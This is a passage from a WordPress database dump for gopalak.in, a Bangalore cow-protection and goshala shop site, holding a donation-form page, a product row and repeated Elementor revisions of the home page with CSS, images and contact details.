animals eat.','cow','','publish','open','closed','','cow','','','2022-10-14 13:09:57','2022-10-14 07:39:57','',0,'https://gopalak.in/?post_type=product&#038;p=1755',0,'product','',0),(1756,1,'2022-10-14 11:20:11','2022-10-14 05:50:11','<!-- wp:shortcode -->\n[​wcdp_donation_form]\n<!-- /wp:shortcode -->','','','publish','closed','closed','','1756-2','','','2022-10-14 11:20:14','2022-10-14 05:50:14','',0,'https://gopalak.in/?page_id=1756',0,'page','',0),(1757,1,'2022-10-14 11:20:11','2022-10-14 05:50:11','<!-- wp:shortcode -->\n[​wcdp_donation_form]\n<!-- /wp:shortcode -->','','','inherit','closed','closed','','1756-revision-v1','','','2022-10-14 11:20:11','2022-10-14 05:50:11','',1756,'https://gopalak.in/?p=1757',0,'revision','',0),(1759,1,'2022-10-14 11:40:33','2022-10-14 06:10:33','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 11:40:33','2022-10-14 06:10:33','',1373,'https://gopalak.in/?p=1759',0,'revision','',0),(1760,1,'2022-10-14 11:40:33','2022-10-14 06:10:33','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 11:40:33','2022-10-14 06:10:33','',1373,'https://gopalak.in/?p=1760',0,'revision','',0),(1761,1,'2022-10-14 11:40:34','2022-10-14 06:10:34','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 11:40:34','2022-10-14 06:10:34','',1373,'https://gopalak.in/?p=1761',0,'revision','',0),(1763,1,'2022-10-14 11:48:50','2022-10-14 06:18:50','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title 